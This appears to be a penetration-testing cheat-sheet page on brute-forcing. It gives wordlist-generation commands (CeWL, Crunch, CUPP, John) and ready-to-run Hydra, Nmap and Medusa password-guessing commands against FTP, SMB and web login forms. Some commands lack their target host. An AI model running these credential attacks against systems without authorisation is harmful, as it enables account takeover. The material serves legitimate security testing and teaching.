Brute Forcing

Brute Forcing #

At a Glance #

A brute-forcing attack consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem’s statement.

In cryptography, a brute-force attack involves systematically checking all possible keys until the correct key is found. 1

Note: The success and efficiency of a brute-force attack rely mostly on the wordlist. Use a highly-reputed one.

Default Credentials #

Note: SecLists and WordList Compendium also include default passwords lists.

Wordlists #

Wordlist Generation #

CeWL 2 #

cewl -m 3 -w wordlist.txt
  • -m <length>: Minimum word length.
  • -w <file>: Write the output to <file>.

Crunch 3 #

Simple wordlist.

crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt

String permutation.

crunch 1 1 -p target pass 2019 -o wordlist.txt


crunch 9 9 0123456789 -t @target@@ -o wordlist.txt
  • <min-len>: The minimum string length.
  • <max-len>: The maximum string length.
  • <charset>: Characters set.
  • -o <file>: Specifies the file to write the output to.
  • -p <charset or strings>: Permutation.
  • -t <pattern>: Specifies a pattern, eg: @@pass@@@@.
    • @ will insert lower case characters
    • , will insert upper case characters
    • % will insert numbers
    • ^ will insert symbols

Password Profiling #

CUPP 4 #

cupp -i
  • -i: Interactive uestions for user password profiling.

Word Mangling #

john 5 #

john --wordlist=wordlist.txt --rules --stdout
  • --wordlist <file>: Wordlist mode, read words from <file> or stdin.
  • --rules[:CustomRule]: Enable word mangling rules. Use default or add [:CustomRule].
  • --stdout: Output candidate passwords.


Custom rules can be appended to John’s configuration file john.conf.

See: KoreLogic’s Word Mangling Rule

Services #


See Combo (Colon Separated) Lists.

Hydra 6 #

hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f ftp
  • -v: verbose mode.
  • -l <user>: login with user name.
  • -P <passwords file>: login with passwords from file.
  • -f: exit after the first found user/password pair.


Hydra 6 #

hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f smb
  • -v: verbose mode.
  • -t <tasks>: run <tasks> number of connects in parallel. Default: 16.
  • -l <user>: login with user name.
  • -P <passwords file>: login with passwords from file.
  • -f: exit after the first found user/password pair.

smb-brute NSE Script. #

sudo nmap --script smb-brute -p U:137,T:139


Hydra 6 #

hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f ftp

Web Applications #

HTTP Basic Auth #

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-head /admin/

HTTP Digest #

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-get /admin/


hydra -l admin -P /usr/share/wordlists/rockyou.txt https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"
  • -l <user>: login with user name.
  • -L <users-file>: login with users from file.
  • -P <passwords file>: login with passwords from file.
  • http-head | http-get | http-post-form: service to attack.

HTTP Authenticated POST Form #

Append the Cookie header with the session id to the options string, e.g., :H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v. 6

hydra -l admin -P /usr/share/wordlists/rockyou.txt https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"

Miscellaneous #

Combo (Colon Separated) Lists #

Hydra 6 #

Use a colon separated login:pass format, instead of -L/-P options.

hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f ftp
  • -v: verbose mode.
  • -C <user:pass file>: colon-separated “login:pass” format.
  • -f: exit after the first found user/password pair.

Medusa 7 #

Medusa’s combo files (colon-separated) should be in the format host:username:password. If any of the three values are missing, the respective information should be provided either as a global value or as a list in a file.

sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h -M ftp
  • -u <user>: login with user name.
  • -P <passwords file>: login with password from file.
  • -h: target hostname or IP address.
  • -M: module to execute.

Further Reading #

  1. Contributors to Wikimedia projects. “Brute-Force Search - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 13 Oct. 2002,↩︎

  2. digininja. “GitHub - Digininja/CeWL: CeWL Is a Custom Word List Generator.” GitHub,↩︎

  3. “Crunch - Wordlist Generator Download.” SourceForge,↩︎

  4. Mebus. “GitHub - Mebus/Cupp: Common User Passwords Profiler (CUPP).” GitHub,↩︎

  5. magnumripper. “JohnTheRipper.” GitHub,↩︎

  6. Heuse, Marc. “GitHub - Vanhauser-Thc/Thc-Hydra: Hydra.” GitHub, Accessed 12 May 2020. ↩︎

  7. “Foofus Networking Services - Medusa.” Foofus.Net | Foofus.Net Advanced Security Services Forum,↩︎